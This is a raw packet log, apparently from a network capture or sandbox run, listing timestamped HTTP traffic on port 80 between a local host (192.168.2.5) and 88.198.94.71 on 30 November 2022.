Nov 30, 2022 00:22:31.781372070 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781392097 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781415939 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781425953 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781454086 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781492949 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781501055 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781537056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781547070 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781575918 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781593084 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781620026 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781639099 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781651974 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781680107 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781704903 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781723976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781738997 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781764984 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781784058 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781811953 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781852007 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781888008 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781922102 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781954050 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781987906 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781999111 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782035112 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782042027 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782064915 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782084942 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782115936 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782128096 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782164097 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782176971 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782207012 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782224894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782254934 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782269955 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782279968 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782310009 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782330036 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782351017 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782365084 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782390118 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782407045 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782429934 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782444000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782469034 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782484055 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782509089 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782538891 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782550097 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782567978 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782591105 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782609940 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782633066 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782644987 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782671928 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782704115 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782730103 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782747984 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782784939 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782789946 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782830000 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782831907 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782860994 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782891989 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.782893896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782932043 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782963037 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.782995939 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783004045 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783040047 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783046961 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783086061 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783087969 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783114910 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783134937 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783138037 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783173084 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783202887 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783231974 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783243895 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783277988 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783286095 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783324957 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783327103 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783355951 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783373117 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783377886 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783411026 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783428907 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783451080 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783468008 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783492088 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783507109 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783531904 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783545971 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783571005 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783586979 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783611059 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783627033 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783649921 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783667088 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783689976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783703089 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783730984 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783744097 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783770084 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783801079 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783809900 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783823967 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783849955 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783864975 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783890009 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783904076 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783927917 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783945084 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.783967972 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.783982038 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784008026 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784024000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784049034 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784061909 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784087896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784101009 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784126043 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784142017 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784166098 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784182072 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784204960 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784220934 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784245014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784270048 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784286976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784315109 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784329891 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784338951 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784368038 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784389019 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784420013 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784434080 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784460068 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784477949 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784501076 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784512997 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784539938 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784554958 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784580946 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784594059 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784621000 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784632921 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784660101 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784673929 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784699917 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784714937 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784744024 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.784749985 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.784797907 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.822935104 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823105097 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823223114 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823280096 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823311090 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823340893 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823343039 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823376894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823398113 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823410034 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823441982 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823446989 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823473930 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823477030 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823493004 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823503971 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823518038 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823533058 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823545933 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823559999 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823576927 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823590040 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823606014 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823621988 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823648930 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823658943 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823678970 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823681116 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823699951 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823712111 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823726892 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823740005 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823757887 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823769093 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823782921 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823798895 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823812962 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823826075 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823848963 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823862076 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823875904 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823884010 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823908091 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823909044 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823921919 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823937893 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823961973 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.823968887 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.823992968 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824001074 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824022055 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824023008 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824035883 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824052095 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824069023 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824098110 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824208021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824251890 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824263096 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824280977 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824300051 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824311018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824323893 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824340105 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824357986 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824368954 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824387074 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824397087 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824409962 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824425936 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824440956 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824454069 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824466944 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824481010 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824498892 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824506998 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824520111 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824534893 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824552059 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824564934 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824577093 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824594021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824618101 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824620008 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824649096 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824650049 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824664116 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824701071 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824706078 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824734926 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824759007 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824767113 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824775934 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824805021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824819088 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824835062 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824856043 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824865103 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824892044 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824896097 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824924946 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824929953 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824942112 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824964046 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.824986935 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.824995995 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825020075 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825026035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825041056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825057983 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825078964 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825084925 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825107098 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825112104 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825131893 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825139999 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825155020 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825186968 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825364113 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825387001 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825408936 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825414896 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825442076 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825444937 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825457096 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825472116 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825496912 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825524092 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825526953 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825550079 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825572014 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825577974 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825603962 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825603962 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825633049 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825637102 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825658083 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825659990 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825673103 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825686932 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825702906 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825716019 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825726986 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825742006 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825757980 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825768948 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825783968 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825812101 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825819016 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825844049 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825864077 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825872898 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825884104 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825901031 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825922012 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825927973 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825946093 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825956106 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.825970888 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.825984001 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826004982 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826011896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826029062 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826040030 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826056004 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826067924 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826082945 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826097012 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826112986 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826123953 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826138020 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826150894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826169968 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826179981 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826189995 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826206923 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826221943 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826232910 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826246023 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826258898 CET	80	49710	88.198.94.71	192.168.2.5
